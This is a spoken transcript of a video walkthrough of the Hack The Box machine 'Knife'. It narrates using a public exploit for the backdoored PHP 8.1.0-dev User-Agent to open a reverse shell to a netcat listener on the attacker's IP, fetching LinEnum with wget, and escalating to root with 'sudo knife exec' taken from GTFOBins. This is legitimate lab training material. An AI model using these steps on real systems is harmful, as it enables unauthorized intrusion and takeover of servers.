Transcript for:
Hack The Box: Knife Overview

[Music] hey guys hackersploit here back again with another video welcome back to the hack the box series in this video we're going to be taking a look at knife now knife was recently retired just a few days ago and a lot of you have been asking me to cover you know recently retired boxes uh this was fairly simple actually completed it before it was retired and um so this is a linux box and again it's not the best that i've come across but in terms of initial exploitation but again the thing i like about it is it does not utilize or it doesn't have any ctf-like you know exploitation challenges set up so again if you're really keen on your enumeration exploiting or gaining access to this box should be fairly simple um right so let's take a look at the nmap results here so i'm going to be using the nmap results that i had from my from the time when i initially uh went through this box so nmap all um you can take a look at the results uh sorry my nmap scan options right over here they're fairly simple um and you can see i scanned all tcp ports of course the ip is different because it changed and of course we have the ssh in regards to the services we have ssh running on port 22 as for the service version it's open ssh 8.2 p1 and we get the distribution banner which tells us it's running ubuntu so there are no vulnerabilities that you can find for this version of openssh you then have a web server running on port 80 and that's running apache http 2.4.41 again same thing nothing vulnerable there and again the distribution or operating system banner is displayed there as for the web application you can see that the nmap script http title tells us that it's uh the title is emergent medical idea so if we open up the web server here let me just do that right now so paste and go you can see that it's a fairly simple html template as at least that's what i think it is and of course trying to access you know the robots.txt file here doesn't give us anything but again we get the operating system banner and it you know essentially displays the information for us there um analyzing the source doesn't reveal much um we can see that uh it has pretty much has internal css styling and a bit of in inline styling we also have some javascript but the javascript here primarily is to do with this particular terminal effect which i'm quite familiar with um so again the next logical step now because if we analyze the nmap scan we can see we don't have any other ports open none of these two services here are vulnerable to any exploits vulnerable inherently to any exploits so it's obvious that the target is the web application now the web application looks fairly simple so the next logical step in terms of web enumeration that you will most likely take is of course to run a directory brute forcing or fuzzing uh to you know try and determine or to find files and directories that could give us an idea of what we need to do but one step that a lot of people actually miss out is enumerating the technologies that are running on the website or on the web server so when i talk about the technologies you can see that we're dealing with a linux box here and we know it's running ubuntu and it has a web server and that's running apache so that gives us an idea of what the stack of what stack is being used so we know it's a linux apache no mysql but that's primarily because the application doesn't need it and php so uh let's try and enumerate a little bit more information about the uh you know this particular stack um so to do this we can use whatweb all right so whatweb is fairly simple to use let me just copy the ip here i can actually just copy the entire url there um we can just say whatweb and paste in the url there and that'll tell us or provide us with a list of technologies and there are versions uh you know that's actually running on the on the web server so we can see it's running apache 2.4.41 we get that html5 the ip and we have something very interesting here we have php 8.1 8.1.0 dev that's interesting and again we also get the x powered by um the x powered by flag here uh that again points towards php 8.1.0 dev what if we use nicto let's try nicto right will that provide us with the same information uh it does it actually tells us right over here that it's running php 8.1.0 dev so that's interesting so what if we actually search for you know php 8.1.0 um you know exploit let's let's see what we can find um looks like we have an interesting exploit here and a github repository so let's take a look at that um let's see what this exploit does and we can see it's for the exact version 8.1.0 dev user agent remote code execution all right so uh we can see that it's been tested on ubuntu 20.04 and the version 8.1.0 dev it provides us with the references there and a readme file which looks like it is in chinese but hey um so it looks like it provides us with a download link for the backdoor but we'll get into that right now so an early release of php the php 8.1.0 dev version was released with a back door on march 28 2021 so this is fairly recent the backdoor was quickly discovered and removed if this version of php runs on a server the following exploit code uses the back door to provide a pseudo shell on the host all right so this will provide us with a pseudo shell if we take a look at the github repository here which is which is what i used to actually get a reverse shell you can see um it gives you a bit of information regarding the back door which again php thankfully provided to us and of course this gives you an idea of how this works uh but uh this particular code there are two python scripts here one of them is uh the reverse shell and the back door so the reverse shell will give you a reverse shell if i can actually say that so you can see here reverse shell and using it is fairly simple we essentially launch it with python 3 provide the target url the attacker or your kali ip and your kali port that you're currently listening on because it's again going to provide us with the reverse shell um so what we can do is we can actually just get this particular a reverse shell a python script so raw i'm just going to get it here and we will save it let me just terminate that clear that out so let's save it here and paste that in there and then i'm going to set up a netcat listener so nvlp1234 let's set up on port one two three four let me also get my vpn ip we can see that that's it right over here right um yeah okay so that's fine let me also copy the let's copy the ip there as for the usability as it says right over here we provide we run the script with python 3 we then provide the um the target url the attack ip and the attacker port all right so we're going to say python python3 provide the name of the script reverse shell php dev dot pi and then we provide the actual url which again over here we'll just provide as http there we are and we then need to provide the our kali ip 10 10 14.107 and the port 1234 and we hit enter and immediately we get a reverse shell right over here and we're logged in as the user james at knife all right so uh if we head over into our working directory into our home directory for the user james you can see we get the user flag so user.txt we get it there if we list out all the files in the home directory we can see that bash history actually goes into dev null so that means it's being cleared or it's not being saved and we have a few other files here all right so we've obtained initial access if we you know again uh trying to enumerate information regarding the actual uh operating system or the distribution version we can see it's ubuntu 20.04.2 lts uh you name a we get the kernel version which is 5.4.0 again we're not performing kernel exploitation we're going to take a look at uh another technique which i'll get to shortly if we list out the users on the system so etsy password we can see that we have a you know user for uh postgresql um we also have a few others like uh well let's see let's see we have the root user of course we know that and a few others but uh we pretty much have access through a user called james all right so the next step is going to you know deal with enumeration and i've pretty much talked of a few tools that you can use um whenever you want to perform enumeration uh like for example a lin p's or the linux exploit suggester but those are primarily for or you know in particular the linux exploit suggester is for exploits you know primarily kernel exploits but not limited to that uh in this video i want to take you through another tool called lin enum which again you should be familiar with so if i just open this up here there we are that's the first link there we can see that this is simply an enumeration tool for um for linux systems and it essentially displays the following information so user information privileged access providers or display uh you know or provide us with good breakout binaries available via sudo and uh yeah so let's actually take a look at how to use this so again you can clone you can actually just get these the shell script and then transfer it over to your target i already have it on my system um so that's being stored in my on my desktop here under linux enum and i'll just serve this directory so when i say serve i'm simply using the python module simple http server to set up a local web server in this particular directory to host the file so again you can see i have a linum.sh there so i'm just going to say serve provide my password here and we'll go into the temp directory and we list all the files in here looks like we have a few files but nothing else nothing interesting or nothing useful if i can say that um right so we can then use wget and then provide the cali ip here so 10 10 14 0.107 and uh we're getting lin enum.sh right we hit enter where we get that successfully and we can then terminate or shut down the web server there we can then use chmod plus x lin uh enum dot sh make it executable and then execute it so linum dot sh so i'm just going to let this complete or go through the enumeration process so once it's done i'll get back to you and then we can start identifying vulnerabilities that we can use to elevate our privileges all right so lynn enum has completed enumerating information and we can take a look at the results here right from the top you can see we get the system information the kernel information and we also get the distribution release information as well as the host name the current user at the current user id the group id are users that have previously logged onto the system who else is currently logged on so on and so forth and then the group memberships and we also get the contents of the etsy password file which we did manually and we also discovered something interesting here so it says we can sudo without supplying a password and then so you might be saying well what does that mean yeah it says matching default entries for james on knife uh and it provides us here with uh the actual environment variables and then it says user james may run the following commands on knife so we can essentially run a knife without providing a password so we can say sudo use a bin knife or just knife but what exactly does knife do well let's actually try that out so we you know because our environment variable has been configured correctly so if we say sorry knife um let's see what this binary does that wow that's quite a bit of information here let's try and find out more about this binary so how exactly do we go uh you know about doing that so we can search for a site called gtfo bins right and uh that's gta 4 bins.github.io all right so let me explain something here if you've never heard of this resource um gtfo bins is a curated list of unix binaries that can be used to bypass local security restrictions uh in misconfigured systems all right so uh it's again as it says it's important to note that this is not a list of exploits and the program listed uh the programs listed here are not vulnerable per se rather gta 4 bins is a compendium about how to live off the land when you only have certain binaries available right so you're essentially just taking advantage of misconfiguration so if we search for the knife binary again there we are we can see it's the first one so we click on knife so you can see that it doesn't give us much information about it but uh we can search for it and let's see what it's uh it's actually used to do because let's see all right so there we are knife um that's under docs.chef.io right so let's see what this does so knife is a command line tool that provides an interface between a local chef repo and the chef infrastructure so again it's used to manage uh infrastructure like nodes cookbooks and recipes let's see what else it does also some i think it actually allows you to work with a few other services which we actually saw there but yeah we get an idea of what it does um so again gta 4 essentially hosts or actually lists out binaries and how they can be exploited right so it says right over here that um knife um if we if we use the shell you can see it can be used to break out from restricted environments by spawning an interactive system shell so again if you're working within a restricted environment with not with no job control you can actually use knife to give you a bash or a shell session similar to what you do with python right so whenever you're you know get a reverse shell and you don't have an interactive environment and you want to spawn a um a bash session you will use python and that's exactly what's happening here uh except if knife is installed on the target you can also get a bash session with knife and for sudo if the binary is allowed to be run a as super user by sudo it it does not drop the elevated privileges and may be used to access the file system uh or escalate or maintain privileged access so what that means is we can get uh an elevated bash session uh you know by running it or running this particular command and because we we can run it uh with root privileges as it said within uh lin enum uh that means we can get a root privileges almost immediately so again if we uh if we just scroll to the top here so that i can just highlight that again where it actually displayed that uh there we are you weaken sudo without supplying a password so we can actually run uh the knife binary without with sudo privileges without providing the root password so or you know providing an administrative password so if we run that so we say sudo knife exec e exec bin sh or just bin bash but we can actually just run it like so um and if we type in id there we are we have root so if i can get a bash session really easily and again there we are we get a bash session again id who am i uh we are root and now if i head over into the root directory uh list all the files there cat root.txt and we get the root flag so yeah that was fairly simple again i wanted to introduce you to gta 4 bins again it's a very very helpful use for very very helpful resource uh whenever you're trying to again uh you know elevate your privileges a break out of a non-interactive session or reverse shell so you can see there does uh quite a few interesting categories based on you know the actual functionality or the binaries that can be used to provide you with the functionality so for example non-interactive or let's look at something more interesting um let's see if we talk about suid binaries it'll provide you with a list of binaries that again if you for example let me just click on bash here well uh let's look for an interesting one here like uh for example cat right um so again if the binary has the suid bit set it does not drop the elevated privileges and maybe may be used to abuse the file system or escalate or maintain privileged access as a suid backdoor it is uh if it is used to run the shp omit the p argument on systems like debian et cetera et cetera and then it provides you with access as to how you can do that so again it's a very very helpful resource i definitely recommend checking it out and yeah that's pretty much all that i wanted to cover in this video this box was fairly simple but again enumeration as you've seen is key and understanding how certain binaries can be exploited is also very very interesting so let me know what you guys think in the comments section uh you can also join us on discord we have a discord server the link will be in the description section uh you can join in uh you know essentially the discussions or the channels for hack the box or try hack me and if you have any issues or you'd like to contribute you can do that there and we also we always have great discussions regarding you know various techniques that can be used to exploit uh you know that can be used for exploitation enumeration and privilege escalation so with that being said thank you very much for watching this video and i'll be seeing you in the next video a huge thank you to all of our patreons your support is greatly appreciated and this is a formal thank you so thank you shamir douglas ryan carr sandor michael busby sits up doozy defean barry dustin umpress and michael hubbard your support is greatly appreciated and you keep us making even more high quality content for you guys so thank you [Music] you